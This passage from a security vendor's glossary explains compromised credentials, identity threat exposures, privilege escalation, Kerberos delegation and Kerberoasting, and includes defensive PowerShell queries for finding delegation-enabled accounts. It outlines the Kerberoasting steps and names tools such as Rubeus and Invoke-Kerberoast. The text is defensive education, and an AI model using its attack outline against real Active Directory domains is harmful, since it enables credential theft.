patterns can indicate compromised credentials or accounts. Security Information and Event Management (SIEM) platforms also aid in detecting compromised credentials by aggregating and analyzing security logs from various systems across the organization. SIEM tools use log correlation and analytics to identify suspicious login attempts, location changes, and privilege escalations which can point to compromised accounts. Continuous monitoring of user accounts and authentication events is crucial for early detection of compromised credentials. Adaptive and risk-based authentication methods provide additional layers of security that help identify unauthorized access. Requiring multi-factor authentication, especially for privileged accounts, makes it more difficult for attackers to exploit compromised passwords. Monitoring for excessive failed login attempts, signs of brute force attacks, and other credential stuffing campaigns also helps to detect compromised accounts before they are misused. Preventing Compromised Credential Attacks To prevent compromised credential attacks, organizations should implement stringent security policies and controls. Multi-factor authentication (MFA) adds an extra layer of protection for user accounts, non-human-identities and systems. Requiring factors like one-time passwords, security keys or biometrics in addition to passwords makes accounts more difficult to compromise. Disallowing previously exposed passwords prevents users from selecting passwords already known to attackers. Using blacklists of compromised passwords, organizations can block employees from choosing easily guessed or reused passwords. Continuous monitoring for exposed credentials on the dark web and password cracking enables swift response. Monitoring password dumps and breach data allows security teams to identify compromised accounts, force password resets and enable MFA. Conducting regular phishing simulations and security awareness training helps educate employees on recognizing and avoiding phishing emails and malicious websites aimed at stealing login credentials. Explaining the risks of oversharing on social media and reusing passwords across accounts builds good security habits and a culture of vigilance. Using CAPTCHAs, or automated tests that humans can pass but computers cannot, adds an extra layer of authentication for logins and account access. CAPTCHAs prevent automated bots and scripts from attempting to access systems using stolen credential sets obtained from data breaches. Enacting and enforcing strong password policies that require lengthy, complex passwords changed frequently is one of the best ways to make compromised credentials more difficult to obtain and use. Mitigation Strategies for Compromised Credentials Once compromised credentials have been identified, there are several mitigation strategies that can be employed to reduce risk. Password Reset The most effective way to mitigate compromised credentials is to immediately reset user passwords. Resetting passwords for affected accounts prevents attackers from accessing systems and data using stolen login information. Enable Multi-Factor Authentication Enabling MFA adds an extra layer of protection for user accounts. MFA requires not only a password but also another method of authentication like a security code sent to the user's mobile device. Even if an attacker obtains a user's password, they would also need to verify their identity to the user's mobile phone to log in. Monitor Accounts for Suspicious Activity Closely monitoring compromised accounts for signs of suspicious logins or activity can help detect unauthorized access. Security teams should check account login times, locations, and IP addresses for anomalies that could indicate an attacker is using stolen credentials to access the account. Detecting unauthorized access quickly can help limit the damage from compromised credentials. Provide Additional Training Compromised credentials are often the result of weak or reused passwords, phishing, or other social engineering attacks. Providing regular security awareness and education training helps educate users on password best practices, phishing identification, and other topics to help reduce the risk of compromise. Additional training and simulated phishing campaigns have been shown to significantly improve security posture over time. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-threat-exposure/ Security weaknesses—such as misconfigurations, outdated identity systems, or exploitable built-in features—that expose organizations to identity-based threats like credential theft, privilege escalation, or lateral movement. Identity Threat Exposures (ITEs) are security weaknesses that expose an environment to identity threats: credential theft, privilege escalation, or lateral movement. An ITE can result from a misconfiguration, legacy identity infrastructure, or even built-in features. Attackers use these ITEs as co-conspirators to perform credential theft, privilege escalation and lateral movement. What’s more, due to the common practice of syncing AD user accounts to the cloud IdP, this underground exposure could also provide attackers with direct access to your SaaS environment. Why are Identity Threat Exposures dangerous? The vast majority of organizations today employ a hybrid identity infrastructure, with Active Directory (AD) for on-prem resources and a cloud IdP for SaaS. The common practice is for AD to sync users’ hashes to the cloud IdP, so users can access SaaS apps with the same credentials as on-prem resources. This significantly increases the SaaS environment’s potential attack surface, as any attack that results in the adversary gaining cleartext passwords paves the way to cloud assets. ITEs that expose weakly decrypted password hashes (NTLM, NTLMv1, admins with SPN) or enable attackers to reset user passwords (shadow admins) are already extensively exploited by adversaries. What Identity Threat Exposures types are there? We classify ITEs into four groups, based on the malicious actions they enable attackers to achieve: Password Exposers: ITEs that allow adversaries to access a user account’s cleartext password. Privilege Escalators: ITEs that enable adversaries to escalate any access privileges they already possess. Lateral Movers: ITEs that enable adversaries to use compromised accounts to perform undetected lateral movement. Protection Dodgers: ITEs that make security controls less effective at monitoring and protecting user accounts. Examples of Identity Threat Exposures CategoryRelated MITRE ATT&CKExamplesPassword ExposersCredential accessNTLM authenticationNTLMv1 authenticationAdmins with SPNPrivilege EscalatorsPrivilege escalationShadow adminsUnconstrained delegationLateral MoversLateral movementService accounts Prolific usersProtection DodgersThere isn’t an exact MITRE ATT&CK technique that maps to this category.  It allows attackers to go undetected for long periods of time. New user accountsShared accountsStale users How to protect against Identity Threat Exposures? Know where you’re exposedMake sure you have visibility into all the different types of ITEs in your environment. If you’re syncing AD users to your cloud IdP, ensure it follows Microsoft’s best practices and does not create a mass of idle users. Eliminate risk where you canMake sure you have visibility into all the different types of ITEs in your environment. If you’re syncing AD users to your cloud IdP, ensure it follows Microsoft’s best practices and does not create a mass of idle users. Contain and monitor existing risksFor ITEs that cannot be eliminated, such as service accounts or the use of NTLM, ensure the SecOps team has a process in place to monitor these accounts closely for any sign of compromise. Take preventative measuresApply identity segmentation rules or apply MFA policies to prevent user accounts from falling victim to featured ITEs where possible. Implement access policies on your service accounts that would block them from accessing any destination beyond their pre-designated resources. Connect the identity and security teamsThe responsibility for identity protection is distributed between the identity and the security teams, where the latter’s knowledge enables them to prioritize which ITEs to resolve, while the former can put these fixes into effect, in effect creating an integrated identity security posture. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/privilege-escalation/ A type of attack in which an adversary acquires higher access controls—either by exploiting bugs or misconfigurations—to perform unauthorized operations. Privilege escalation is a term used in cybersecurity that describes an attacker's actions to gain unauthorized access to resources or perform unauthorized actions within a computer system or network. This type of attack can occur in any organization's environment, from individual machines to large-scale network infrastructures. There are two primary types of privilege escalation: Vertical Privilege Escalation: Also known as "privilege elevation," this occurs when an attacker gains higher privileges when targeting administrative or root access. This allows the attacker to perform virtually any operation on the system, such as accessing confidential data, modifying system configurations, or deploying malicious software. Horizontal Privilege Escalation: In this scenario, an attacker expands their access across a network by assuming the identity of other users with similar privilege levels. Although not elevating their privilege vertically, the attacker gains unauthorized access to additional resources, which can be exploited for information theft or further attacks within the network. Common Scenarios of Privilege Escalation Exploiting Software Vulnerabilities: Attackers often exploit flaws in software or operating systems that allow them to elevate their privileges. These vulnerabilities can stem from inadequate testing, legacy code, or unpatched systems. Configuration Errors: Misconfigured systems and services with overly permissive rights can inadvertently grant low-privileged users access to sensitive functions or data. Shadow Admins: Shadow admins are user accounts that have been inadvertently assigned full or partial admin privileges, or configuration/reset privileges over admin accounts. Compromising a shadow admin enables an attacker to control an account that has high access and configuration privileges, paving the way to further access and compromise of additional resources. Unconstrained Delegation: it’s the insecure legacy version of delegation. It allows a compromised account to access all the same resources as the delegating account. This capability is mostly required for machine accounts that access other machines on behalf of a user; for example, when an app server accesses a database to fetch data for an app user. When an admin account logs in to a machine that has unconstrained delegation, its TGT remains stored in the machine’s memory. This allows the attacker to establish a new session with the privileges of the user account’s TGT. Social Engineering and Phishing Attacks: By deceiving legitimate users or administrators into executing malicious actions, attackers can gain elevated privileges. Use of Stolen Credentials: Attackers may use various methods to steal credentials, such as keylogging or exploiting a data breach. These credentials are then used to access systems as a legitimate user, bypassing security measures. Lateral Movement: Privilege escalation often precedes lateral movement in an attack chain. Initially, attackers may gain access to a network with limited privileges. Through privilege escalation, they acquire higher-level permissions necessary to access more secure areas of the network or execute specific tasks, such as installing malware or extracting sensitive data. Detecting Privilege Escalation Attempts Privilege escalation detection is a critical component of a comprehensive cybersecurity defense strategy. By identifying these attempts early, IT and security professionals can mitigate potential damage and prevent attackers' efforts to gain unauthorized access. This section outlines key indicators of compromise (IoCs) and the tools and techniques used for effective detection. Indicators of Compromise (IoCs) Unusual Account Activity: This includes repeated login failures, use of privileged commands by non-administrative users, or sudden changes in user permissions. Such activities may indicate an attacker's attempt to gain or exploit elevated privileges. Unexpected System Changes: Modifications to system files, installation of new software, or alterations in system configuration settings without prior approval or notification can signal an ongoing privilege escalation attack. Anomalies in Network Traffic: Unusual outbound traffic patterns, especially to known malicious IP addresses or domains, might suggest that an attacker is exfiltrating data after gaining elevated access. Security Log Tampering: Attackers often try to cover their tracks by deleting or altering security logs. Unexplained gaps in log files or inconsistencies in log entries can be a telltale sign of manipulation to hide unauthorized actions. Mitigation Strategies and Best Practices A combination of preventive measures, robust security policies, and a culture of cybersecurity awareness within the organization is required to effectively mitigate the risk of privilege escalation. Below are key strategies and best practices designed to minimize the exposure to privilege escalation attacks and bolster security posture. Preventive Measures Regular Software Updates and Patch Management: One of the simplest yet most effective defenses against privilege escalation involves keeping all systems and software up to date. Regularly applying patches closes vulnerabilities that attackers could exploit to gain elevated privileges. Principle of Least Privilege (PoLP): Enforce the principle of least privilege by ensuring that users have only the access rights necessary for their roles. Regular reviews and audits of user privileges help prevent the accumulation of unnecessary access rights that could be exploited. Strong Authentication and Access Control Measures: Implement multi factor authentication (MFA) and robust access policies to secure user accounts against unauthorized access attempts. For sensitive systems and high-privilege accounts, consider using advanced authentication methods, such as biometrics or hardware tokens. Segregation of Duties (SoD): Divide critical tasks and permissions among multiple users or departments to reduce the risk of a single point of compromise. This approach limits the potential damage an attacker can inflict if they manage to escalate privileges within one segment of the organization. Response Strategies Identity Threat Detection and Response (ITDR): To detect threats related to identity compromise and abuse in real-time. By analyzing access patterns and behaviors, ITDR solutions can identify suspicious activities that may indicate a privilege escalation attempt and respond accordingly. Incident Response Planning: Develop and regularly update a comprehensive incident response plan that includes specific procedures for handling privilege escalation incidents. This plan should outline roles, responsibilities, communication protocols, and steps for containment, eradication, and recovery. Proactive Monitoring and Alerting: Utilize SIEM, EDR, identity security and UEBA solutions to continuously monitor for signs of privilege escalation. Configure alerts for anomalous activities indicative of an escalation attempt, enabling rapid response before attackers can cause significant damage. Forensic Analysis and Remediation: Following a privilege escalation incident, conduct a thorough forensic analysis to understand the attack vectors, exploited vulnerabilities, and the scope of the breach. Use this information to strengthen security measures and prevent future occurrences. Best Practices for a Secure Environment Security Awareness Training: Regularly train all employees on cybersecurity best practices, the dangers of social engineering, and the importance of maintaining operational security. Educated users are less likely to fall victim to attacks that could lead to privilege escalation. Secure Configuration and Hardening: Apply secure configuration guidelines and hardening standards to all systems and applications. Remove unnecessary services, close unused ports, and enforce security settings to reduce the attack surface. Vulnerability Scanning and Penetration Testing: Periodically perform vulnerability assessments and penetration tests to identify and remediate security weaknesses. These exercises can uncover potential privilege escalation pathways before they are exploited by attackers. As a result of implementing these mitigation strategies and adhering to cybersecurity best practices, organizations can significantly reduce the risk of privilege escalation attacks. Defending against such threats requires both technical solutions and a proactive security culture that places vigilance, education, and continuous improvement at the forefront. Privilege Escalation in Cloud Environments Due to the shift towards cloud computing, preventing privilege escalation has become more complex and challenging. As a result of the inherent scalability, flexibility, and shared responsibility models of cloud environments, security must be approached differently. This section highlights the distinctive challenges of cloud-based infrastructure and offers best practices for securing cloud environments against privilege escalation threats. Unique Challenges in Cloud Environments Complex Identity and Access Management (IAM) Configurations: Cloud platforms offer granular IAM capabilities, which, if misconfigured, can inadvertently grant excessive permissions, leading to privilege escalation opportunities. Shared Responsibility Model: The division of security responsibilities between the cloud service provider (CSP) and the customer can lead to gaps in coverage, especially if there is ambiguity about who is responsible for securing IAM configurations. API Security: Cloud services are often accessed and managed through APIs, which, if not secured properly, can become vectors for privilege escalation attacks. Ephemeral Resources and Dynamic Access: The dynamic nature of cloud environments, with resources being spun up and down, requires adaptive and continuously updated access controls to prevent excessive permissions. Best Practices for Securing Cloud Environments Implement Least Privilege Access for Cloud Resources: Similar to on-premises practices, ensure that cloud IAM policies strictly adhere to the principle of least privilege. Regularly audit IAM policies and roles to eliminate unnecessary permissions that could be exploited. Utilize Cloud-native IAM Tools: Leverage tools provided by CSPs, such as AWS IAM Access Analyzer or Azure AD Privileged Identity Management, to analyze permissions and detect potential privilege escalation paths. Secure Management Interfaces and APIs: Enforce MFA and strong authentication methods for accessing cloud management interfaces and APIs. Apply network restrictions, such as IP whitelisting, to limit access to these critical endpoints. Automate Detection and Remediation: Use cloud security posture management (CSPM) tools to automate the detection of misconfigurations and IAM anomalies. Implement automated remediation workflows to quickly address identified issues. Educate and Train Cloud Teams: Ensure that teams working with cloud environments are knowledgeable about cloud security best practices and the specific security features of your CSP. Regular training can help prevent accidental misconfigurations that lead to privilege escalation. Continuous Monitoring and Logging: Enable and monitor cloud service logs to detect unusual access patterns or changes to IAM configurations. Use cloud-native or third-party SIEM solutions to aggregate and analyze log data for signs of potential privilege escalation. Adopt a DevSecOps Approach: Integrate security into the CI/CD pipeline to ensure that IAM policies and cloud configurations are evaluated as part of the development and deployment process. This proactive approach helps catch and remediate security issues before they reach production. Securing cloud environments against privilege escalation requires a proactive, layered approach that combines technical controls, continuous monitoring, and a strong security culture. By addressing the unique challenges of cloud IAM and leveraging cloud-native security tools, organizations can enhance their defense against privilege escalation attacks in the cloud. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/unconstrained-delegation/ A Kerberos delegation type that allows a service to act on behalf of a user to any other service, posing significant security risks if misused. Unconstrained Delegation is a feature within Active Directory environments that allows designated services to act on behalf of users, requesting access to other network resources without requiring additional authentication. This delegation model grants specified services a broad authority, making them trusted to impersonate any user to any service. Unconstrained delegation is the insecure legacy version of Kerberos Delegation which was later followed by constrained delegation and eventually resource-constrained delegation. This capability is intended to streamline service interactions, particularly in complex, multi-tiered network architectures where services must communicate across boundaries securely and efficiently. How Unconstrained Delegation Works At its core, Unconstrained Delegation operates by leveraging Kerberos tickets. When a user authenticates to a service enabled for Unconstrained Delegation, the Key Distribution Center (KDC) issues a Ticket-Granting Ticket (TGT) along with the usual service ticket. This TGT, which effectively proves the user's identity, can then be presented by the service to the KDC to request tickets to other services on behalf of the user. This process allows for seamless access across services without repeated user authentication prompts. However, Unconstrained Delegation contrasts sharply with its more restrictive counterpart, Constrained Delegation. While Unconstrained Delegation places no limitations on the services to which the delegated service can request access on behalf of the user, Constrained Delegation tightly controls this by specifying exactly which services are accessible. This distinction is crucial for security planning, as the broader permissions associated with Unconstrained Delegation pose a greater risk if misconfigured or exploited by malicious actors. The use of Unconstrained Delegation is typically reserved for scenarios where services require extensive cross-domain interactions that cannot be efficiently managed through Constrained Delegation. Examples include highly integrated application environments and situations where services need to perform wide-ranging actions across various network segments on behalf of users. Despite its utility, the security implications of granting such wide-reaching delegation rights necessitate careful consideration and management to prevent abuse. The Risks Associated with Unconstrained Delegation The utility of Unconstrained Delegation, particularly in complex IT environments, is undeniable. Broad permissions model introduces substantial security risks, making it a target for exploitation in cyber attacks. The primary concern with Unconstrained Delegation revolves around its potential misuse for lateral movement and privilege escalation within a network. One of the most significant risks is that if an attacker compromises a service account enabled for Unconstrained Delegation, they gain the ability to request access tokens for any other service on behalf of any user. It is possible to use this capability to access sensitive information or to take unauthorized actions across the network, effectively turning a single compromised account into a gateway for widespread network penetration. It is especially concerning in environments where service accounts with Unconstrained Delegation privileges have not been properly secured or monitored. The exploitation of Unconstrained Delegation can also facilitate the execution of sophisticated cyber attacks, including Kerberoasting. Kerberoasting takes advantage of the Kerberos protocol's use of weak encryption for certain aspects of ticket exchange. Attackers can request service tickets on behalf of any user for services enabled for Unconstrained Delegation, then attempt to crack the tickets offline to discover service account passwords. This attack vector underscores the importance of strong, complex passwords for service accounts and highlights the risks associated with Unconstrained Delegation. The inherent complexity and administrative overhead associated with managing Unconstrained Delegation settings introduces another layer of risk. Misconfigurations can result in unauthorized access to services, and IT environments are dynamic, so what is secure today may not be secure tomorrow. To mitigate these risks, continuous vigilance, regular audits, and a thorough understanding of delegation settings are essential. There have been a number of real-world incidents that illustrate the dangers of improperly managed Unconstrained Delegation. Attackers have taken advantage of this vulnerability to move laterally within networks, escalate their privileges, and cause significant damage to an organization's IT infrastructure. These incidents serve as powerful reminders of the potential consequences of overlooking the security implications of Unconstrained Delegation. Best Practices for Secure Delegation Securing Unconstrained Delegation necessitates a proactive multi-layered approach, focused on minimizing its inherent risks while leveraging its functionality. Achieving a balance between operational requirements and robust security measures requires the adoption of best practices. Here are strategic practices to enhance the security of Unconstrained Delegation: 1. Employ Constrained Delegation Wherever Possible Transitioning to Constrained Delegation provides a tighter security model by explicitly limiting the services to which a delegated account can present delegated credentials. This limitation significantly reduces the risk of unauthorized access through delegation, making it a preferred alternative to Unconstrained Delegation whenever feasible. 2. Regular Audits and Monitoring Continuous monitoring and periodic audits of delegation settings are crucial. Organizations should implement solutions that provide visibility into how delegated permissions are being used and by whom. Regular reviews help identify misconfigurations or unnecessary delegation permissions that could expose the network to risks. 3. Apply the Principle of Least Privilege Minimize the number of accounts with Unconstrained Delegation permissions and ensure that these accounts possess only the necessary privileges for their intended functions. This practice limits the potential damage an attacker can inflict if they compromise a delegated account. 4. Use Strong Authentication Mechanisms Enhancing the authentication requirements for accounts with delegation permissions adds an additional layer of security. Implementing Multi-Factor Authentication (MFA) and strong password policies for these accounts can help protect against credential theft and misuse. 5. Segmentation of Network Resources Network segmentation can limit the scope of lateral movement in case of an account compromise. By dividing the network into segments with controlled access, organizations can reduce the reach of accounts with Unconstrained Delegation and contain potential breaches more effectively. 6. Implementing Advanced Security Solutions Utilizing advanced security solutions that can detect and respond to anomalous activities associated with Unconstrained Delegation can significantly enhance protection. Solutions that offer Identity Threat Detection and Response (ITDR) capabilities can identify suspicious patterns of behavior related to delegation, such as abnormal access requests, and provide real-time mitigation. 7. Education and Awareness It is essential that IT and security teams are aware of the risks associated with Unconstrained Delegation and understand best practices for its secure use. By scheduling regular training sessions, it is possible to maintain a high level of attention and ensure that security considerations are incorporated into the management of delegation settings. Incorporating these best practices into security strategies can help organizations mitigate the risks associated with Unconstrained Delegation, ensuring that the convenience and functionality it offers do not compromise network security. Finding Where Unconstrained Delegation Has Been Enabled Finding where Unconstrained Delegation has been enabled in your Active Directory (AD) environment is crucial for understanding potential security risks and ensuring your network's integrity. Here’s a systematic approach to identify these configurations: Using PowerShell PowerShell is a powerful tool for managing and querying Active Directory environments. You can use it to find accounts with Unconstrained Delegation enabled by executing a simple script. Open PowerShell with Administrative Privileges: Launch PowerShell as an administrator to ensure you have the necessary permissions to query AD. Import the Active Directory Module: If not already available by default, you might need to import the Active Directory module with the command: Import-Module ActiveDirectory Execute a Query to Find Unconstrained Delegation: Use the Get-ADUser and Get-ADComputer cmdlets to search for user and computer accounts where the TrustedForDelegation property is True. This property being True indicates that Unconstrained Delegation is enabled. Here's how you can structure the command: Get-ADUser -Filter 'TrustedForDelegation -eq $true' -Properties TrustedForDelegation | Select-Object Name, DistinguishedName, TrustedForDelegationAnd for computer accounts: Get-ADComputer -Filter 'TrustedForDelegation -eq $true' -Properties TrustedForDelegation | Select-Object Name, DistinguishedName, TrustedForDelegation Review the Output: The commands will list the AD users and computers that have Unconstrained Delegation enabled. Pay close attention to these accounts, as they possess significant permissions that could be exploited if compromised. Using Active Directory Users and Computers (ADUC) For those who prefer a graphical user interface (GUI), the Active Directory Users and Computers (ADUC) tool can be used: Open ADUC: Ensure you have the necessary administrative privileges to access and modify AD objects. Enable Advanced Features: Go to the “View” menu and ensure that “Advanced Features” is checked. This option reveals additional properties for AD objects. Search for Accounts with Unconstrained Delegation: Navigate through your AD structure and inspect the properties of user and computer accounts. Under the “Delegation” tab, accounts with Unconstrained Delegation will have “Trust this user for delegation to any service (Kerberos only)” selected. Document and Review: Keep a record of all accounts with Unconstrained Delegation enabled for further review and possible action. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/kerberos-delegation/ A Kerberos mechanism that allows services to act on behalf of authenticated users to access other services, with variants—unconstrained, constrained, and resource-based—offering differing levels of security control. Kerberos delegation allows a service to request resources or perform actions on behalf of a user, while maintaining the security principles of authentication and authorization. Delegation within Kerberos plays a pivotal role in facilitating secure, seamless interactions between services on behalf of users. Kerberos, a cornerstone of modern network security architectures, offers a robust framework for authenticating users and services over a non-secure network. It eliminates the need to transmit passwords directly, instead using cryptographic tickets to prove identity. However, in complex IT environments, situations frequently arise where a service must act on behalf of a user to access other services. This requirement led to the development of Kerberos delegation. This capability is vital in scenarios where user-initiated processes involve multiple tiers of services, each requiring authentication. The concept might seem straightforward, yet its implementation and the security considerations it entails are complex and nuanced. It is essential for IT and cybersecurity professionals to understand the mechanics, applications, and risks associated with Kerberos delegation to effectively secure their environments. How Kerberos Delegation Works The Kerberos protocol was originally designed for a simpler networked environment, with the goal of authenticating users to services that could be accessed directly. The need for services to communicate on behalf of users became apparent as IT infrastructures evolved into more layered and integrated architectures. In order to accommodate this change, Kerberos developed delegation, allowing for more complex interactions while maintaining security assurances. The delegation process in Kerberos involves several key steps: The user authenticates to the Kerberos Key Distribution Center (KDC) and receives a Ticket-Granting Ticket (TGT). When accessing a service that requires delegation, the service requests a service ticket from the KDC on behalf of the user, indicating the need to access another service downstream. The KDC issues a service ticket that the initial service can use to request access to the downstream service on behalf of the user. This mechanism ensures that user credentials are never exposed to services, adhering to Kerberos' security principles. Types of Kerberos Delegation To address varying levels of security needs and application architectures, three different types of Kerberos delegation have been developed. These types—unconstrained, constrained, and resource-based constrained delegation—each offer different mechanisms for services to act on behalf of users, with specific controls over what services can be accessed. Unconstrained Delegation This is the most permissive form of delegation within Kerberos, allowing a service to request access to any other service on behalf of the user. With unconstrained delegation, once a user authenticates to a service, that service can obtain tickets to any other service for the user. This form of delegation is powerful but poses significant security risks if not carefully managed, as it essentially grants the service wide-ranging powers to act on behalf of the user. Constrained Delegation Introduced to mitigate the risks associated with unconstrained delegation, constrained delegation limits the services to which a delegate can request access on behalf of the user. It requires specifying in advance which services are allowed for delegation, providing a controlled and secure environment for delegation to occur. This setup relies on the Service for User to Proxy (S4U2Proxy) extension, which enables a service to obtain a ticket to a specific service on behalf of the user, but only if that service is explicitly allowed. Resource-Based Constrained Delegation An evolution of constrained delegation, resource-based constrained delegation further enhances security and flexibility by allowing the target service's administrator to control which services can delegate to it. Introduced in Windows Server 2012, this type shifts the delegation configuration from the domain controller to the resource itself. It leverages the Service for User to Self (S4U2Self) and S4U2Proxy extensions to allow a service to request access on behalf of the user based on permissions defined at the resource level, not globally across the domain. Each type of delegation addresses specific security concerns and operational needs: Unconstrained Delegation is suitable for highly trusted environments where ease of use trumps the potential for abuse. Constrained Delegation provides a balanced approach, offering flexibility while significantly limiting the potential for misuse by restricting delegation to specified services. Resource-Based Constrained Delegation offers the highest level of control and security, allowing resource owners to directly manage which services can act on their behalf, thereby minimizing the risk of unauthorized delegation. Security Considerations and Risks Security considerations and risks are paramount in the complex world of Kerberos delegation. Each type of delegation—unconstrained, constrained, and resource-based constrained—carries specific vulnerabilities that could potentially be exploited if not properly managed. Understanding these risks and the measures to mitigate them is essential for maintaining the integrity and security of an IT environment. Unconstrained Delegation Risks The most significant risk with unconstrained delegation is the possibility of a compromised service account being used to access any other service within the network on behalf of users. This could lead to privilege escalation and lateral movement within the network if attackers gain control of such an account. Mitigation strategies include limiting the use of unconstrained delegation to highly trusted services, using more secure forms of delegation where possible, and employing strict monitoring and auditing to detect unusual activity. Constrained Delegation Risks While constrained delegation limits the scope of services that a delegated account can access, misconfigurations or overly permissive settings can still present opportunities for attackers. For example, if a service account is allowed to delegate to sensitive services, and that account is compromised, the impact could be substantial. Mitigating these risks involves regularly reviewing the services allowed in the msDS-AllowedToDelegateTo attribute and ensuring that only necessary services are permitted. Resource-Based Constrained Delegation Risks The decentralization of delegation authority to resource owners increases flexibility but also introduces the risk of inconsistent security policies or configurations across different resources. If a resource owner inadvertently allows delegation from an insecure service, it could compromise the resource. To mitigate these risks, organizations should establish clear policies for configuring resource-based constrained delegation, provide training for resource owners, and conduct regular audits to ensure compliance with security best practices. How to identify if Kerberos is being used There are a few methods you can use to identify the presence of Kerberos: Check the system logs: On Linux systems, the Kerberos authentication events are usually logged in /var/log/messages or /var/log/syslog. On Windows systems, they are usually located in the Event Viewer under the "Security" category. Look for errors or warnings related to Kerberos. Common error messages include: "KDC_ERR_SERVER_NOT_FOUND" "KDC_ERR_CLIENT_NOT_TRUSTED" "KDC_ERR_INVALID_CREDENTIAL" "KRB5KDC_ERR_ETYPE_NOSUPP" "KRB5KDC_ERR_PREAUTH_FAILED" Look for Kerberos configuration files: On Linux systems, the Kerberos configuration files are typically located in /etc/krb5. conf. On Windows systems, they are usually located in %WINDIR%\krb5. ini. Check the configuration files for errors or inconsistencies. Make sure that the Kerberos realm is correct and that the KDC servers are listed correctly. Check the registry: On Windows systems, the Kerberos configuration is also stored in the registry. The relevant registry key is HKLM\SYSTEM\CurrentControlSet\Services\Kdc. Check the registry key for errors or inconsistencies. Make sure that the Kerberos realm is correct and that the KDC servers are listed correctly. Use a network sniffer: A network sniffer can be used to capture Kerberos authentication traffic. This can be useful for troubleshooting Kerberos problems or for monitoring Kerberos activity. Look for errors or anomalies in the Kerberos traffic. Use a Kerberos testing tool: There are a number of Kerberos testing tools available that can be used to test the Kerberos configuration and authentication process. Some of these tools include: kinit klist kdcdiag krb5-test-client krb5-test-server Use the Kerberos testing tools to test the Kerberos configuration and authentication process. Look for errors or inconsistencies in the test results. Configuration and Management Configuring and managing Kerberos delegation is a critical step in ensuring that it serves its intended purpose without compromising security. Each type of delegation—unconstrained, constrained, and resource-based constrained—requires specific configuration steps, involving both the Active Directory environment and individual service settings. Unconstrained Delegation: Enable on a service account by setting the TRUSTED_FOR_DELEGATION flag in the Active Directory user account properties. No restrictions are placed on the services to which the delegate can request tickets on behalf of the user, making careful selection of accounts for this delegation type crucial to avoid security risks. Constrained Delegation (S4U2Proxy): Configure by specifying the services to which a particular service account can present delegated credentials. This is done by modifying the msDS-AllowedToDelegateTo attribute in the service account's Active Directory object. Requires setting the TRUSTED_TO_AUTH_FOR_DELEGATION flag on the service account if protocol transition (S4U2Self) will also be used, allowing services to request tickets on behalf of users without an initial Kerberos authentication. Resource-Based Constrained Delegation: Configure by setting permissions on the target service's Active Directory object, specifically in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This allows the resource owner to control which services can delegate to it directly. Unlike traditional constrained delegation, resource-based constrained delegation does not require changes on the delegate service account, simplifying management and increasing flexibility. Conclusion Kerberos delegation offers a robust framework that allows users to navigate the complex security demands of modern networked environments. Through delegation, Kerberos has evolved as a solution to authenticate users across non-secure networks. Even though this capability is powerful, it requires a comprehensive understanding and meticulous management if it is to be harnessed effectively while mitigating the inherent security risks. In all forms of Kerberos delegation, security considerations are of the utmost importance. Due to the potential for abuse or misconfiguration, vigilant management, regular auditing, and the principle of least privilege are required. By understanding the specific risks associated with each delegation type and employing best practices, organizations can significantly reduce vulnerabilities. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/kerberoasting/ A stealthy AD attack where adversaries request Kerberos Ticket Granting Service (TGS) tickets for service accounts, then crack them offline to reveal service account credentials. Kerberoasting is a sophisticated attack method that exploits the Kerberos authentication protocol integral to Active Directory (AD). Kerberos is designed to facilitate secure authentication over potentially insecure networks, and becomes an unwitting accomplice in these attacks, providing a backdoor through which attackers can gain unauthorized access to sensitive systems and data. Kerberoasting specifically targets service accounts within an AD environment, exploiting the fact that any authenticated user can request Ticket Granting Service (TGS) tickets for any service. Attackers leverage this functionality to request TGS tickets associated with Service Principal Names (SPNs), then work offline to crack the encrypted tickets and extract service account passwords. This technique allows attackers to bypass network defenses and gain access to restricted areas undetected. The threat posed by Kerberoasting is significant due to its stealthy nature and the potential for high-impact breaches. Organizations leveraging AD for network authentication and authorization must be aware of this threat vector to implement effective defenses. Understanding Kerberoasting — its mechanisms, implications, and prevention strategies — is crucial for cybersecurity and IT professionals tasked with defending their organizations' digital assets. How Kerberoasting Works Kerberoasting exploits the Kerberos authentication protocol, which is a core aspect of Active Directory (AD) used for authenticating users and services in a network. Understanding this attack requires a foundational grasp of Kerberos itself, which operates on a ticket-based mechanism to ensure secure communications across a network. The Kerberos Authentication Protocol At the heart of Kerberos is the Ticket Granting Ticket (TGT), obtained upon a user's successful login. The TGT is then used to request Ticket Granting Service (TGS) tickets for accessing various network services. These services are identified by their Service Principal Names (SPNs). It's a system designed for security, but its architecture inadvertently opens a door for exploitation. The Attack Vector Kerberoasting takes advantage of the fact that any authenticated user within a domain can request TGS tickets for any service defined under an SPN. By posing as a legitimate user, an attacker requests TGS tickets for services, which are encrypted using the password of the service account. This attack relies on the attacker's ability to take these encrypted tickets offline and attempt to crack them in order to reveal the password of the service account. This process involves the following steps: Scanning for Service Accounts: Attackers scan the AD for user accounts with associated SPNs, which indicate service accounts. Requesting TGS Tickets: Using a legitimate user's credentials, attackers request TGS tickets from the AD domain controller for those identified service accounts. Extracting and Cracking the Tickets: The attacker then extracts the encrypted part of the TGS tickets and uses offline brute force or password cracking tools to discover the service account's password. Why It's Effective Kerberoasting is particularly effective because it can be conducted with standard user privileges and without triggering alerts that might be associated with other forms of attack, such as direct password brute force attempts against the network. Moreover, the offline nature of the password cracking effort evades the detection mechanisms that networks typically employ to identify suspicious activities, such as multiple failed login attempts. This attack underscores a critical vulnerability in the Kerberos protocol's implementation within Windows AD environments — the reliance on the secrecy and strength of service account passwords. Given the silent and stealthy nature of Kerberoasting, it poses a significant threat to organizations, enabling attackers to gain access to sensitive services and data. The Threat Landscape In organizational networks, Kerberoasting attacks are common and successful, illustrating a critical vulnerability in cybersecurity. As attackers refine their methodologies, Kerberoasting remains an attractive exploit due to its combination of stealth and effectiveness. It is vital to understand how this threat operates in order to devise defenses that will be able to withstand its complexity. Prevalence of Kerberoasting Attacks Kerberoasting has become a common attack method, partly due to the ubiquity of Windows Active Directory (AD) in corporate environments and the relative simplicity of executing the attack. Tools like PowerSploit's Invoke-Kerberoast module or Rubeus make these attacks accessible even to less technically sophisticated attackers. Real-world incidents, including notable breaches attributed to state-sponsored actors and criminal groups, highlight the ongoing 